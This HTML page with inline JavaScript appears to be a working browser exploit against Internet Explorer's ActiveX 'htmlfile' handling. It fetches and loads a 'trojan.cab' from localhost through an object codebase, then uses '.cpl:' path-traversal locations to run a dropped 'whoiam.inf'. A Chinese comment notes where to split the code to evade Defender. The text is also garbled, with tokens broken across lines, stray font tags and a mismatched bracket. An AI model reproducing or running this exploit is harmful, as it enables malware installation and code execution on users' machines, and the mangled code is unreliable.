<!DOCTYPE html><font><
/
font>
<html><font><
/
font>
<head><font><
/
font>
<meta http
-
equiv
=
"Expires"
content
=
"-1"
><font><
/
font>
<meta http
-
equiv
=
"X-UA-Compatible"
content
=
"IE=11"
><font><
/
font>
<
/
head><font><
/
font>
<body><font><
/
font>
<script><font><
/
font>
function(){<font><
/
font>
try
{<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'appendChild'
][
'call'
](window[
'document'
][
'body'
],<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
));<font><
/
font>
}catch(_0x1c747c){<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'appendChild'
][
'call'
](window[
'document'
][
'documentElement'
],<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
));<font><
/
font>
}<font><
/
font>
iframeActxHtml1
=
new window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
)[
'contentWindow'
][
'ActiveXObject'
](
'htmlfile'
);<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
)[
'contentDocument'
][
'open'
]()[
'close'
]();<font><
/
font>
try
{<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'removeChild'
][
'call'
](window[
'document'
][
'body'
],<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
));<font><
/
font>
}catch(_0x5afb73){<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'removeChild'
][
'call'
](window[
'document'
][
'documentElement'
],<font><
/
font>
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](window[
'document'
],
'iframe'
));<font><
/
font>
}<font><
/
font>
<font><
/
font>
iframeActxHtml1[
'open'
]()[
'close'
]();<font><
/
font>
var iframeActxHtml2
=
iframeActxHtml1[
'Script'
][
'ActiveXObject'
)](
'htmlFile'
);<font><
/
font>
iframeActxHtml2[
'open'
]()[
'close'
]();<font><
/
font>
iframeActxHtml3
=
iframeActxHtml2[(
'Script'
)][
'ActiveXObject'
](
'htmlFile'
);<font><
/
font>
iframeActxHtml3[
'open'
]()[
'close'
]();<font><
/
font>
var iframeActxHtml4
=
new iframeActxHtml3[
'Script'
][(
'ActiveXObject'
)](
'htmlFile'
);<font><
/
font>
iframeActxHtml4[
'open'
]()[
'close'
]();<font><
/
font>
var actx_html_0
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_1
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_2
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_3
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_4
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
actx_html_5
=
new ActiveXObject(
'htmlfile'
),<font><
/
font>
xmlhttpreq1
=
new window[
'XMLHttpRequest'
](),<font><
/
font>
window[
'setTimeout'
]
=
window[
'setTimeout'
];
/
/
此处可拆分过defender<font><
/
font>
window[
'XMLHttpRequest'
][
'prototype'
][
'open'
][
'call'
](xmlhttpreq1,
'GET'
,
'http://localhost/trojan.cab'
,![]),<font><
/
font>
window[
'XMLHttpRequest'
][
'prototype'
][
'send'
][
'call'
](xmlhttpreq1),<font><
/
font>
iframeActxHtml4[
'Script'
][
'document'
][
'write'
](
'<body>'
);<font><
/
font>
var cabloadunpack
=
window[
'Document'
][
'prototype'
][
'createElement'
][
'call'
](iframeActxHtml4[
'Script'
][
'document'
],
'object'
);<font><
/
font>
cabloadunpack[
'setAttribute'
](
'codebase'
,
'http://localhost/trojan.cab#version=5,0,0,0'
);<font><
/
font>
cabloadunpack[
'setAttribute'
](
'classid'
,
'CLSID:b7771b25-4e74-4168-add9-04062d629d9a'
),<font><
/
font>
window[
'HTMLElement'
][
'prototype'
][
'appendChild'
][
'call'
](iframeActxHtml4[
'Script'
][
'document'
][
'body'
],cabloadunpack),<font><
/
font>
<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:123'
,<font><
/
font>
actx_html_0[
'Script'
][
'location'
]
=
'.cpl:../../../AppData/Local/Temp/Low/whoiam.inf'
,<font><
/
font>
actx_html_1[
'Script'
][
'location'
]
=
'.cpl:../../../AppData/Local/Temp/whoiam.inf'
,<font><
/
font>
actx_html_2[
'Script'
][
'location'
]
=
'.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf'
,<font><
/
font>
actx_html_3[
'Script'
][
'location'
]
=
'.cpl:../../../../AppData/Local/Temp/whoiam.inf'
,<font><
/
font>
actx_html_4[
'Script'
][
'location'
]
=
'.cpl:../../../../../Temp/Low/whoiam.inf'
,<font><
/
font>
actx_html_3[
'Script'
][
'location'
]
=
'.cpl:../../../../../Temp/whoiam.inf'
,<font><
/
font>
actx_html_3[
'Script'
][
'location'
]
=
'.cpl:../../Low/whoiam.inf'
,<font><
/
font>
actx_html_3[
'Script'
][
'location'
]
=
'.cpl:../../whoiam.inf'
;<font><
/
font>
}();<font><
/
font>
<
/
script><font><
/
font>
<
/
body><font><
/
font>
<
/
html>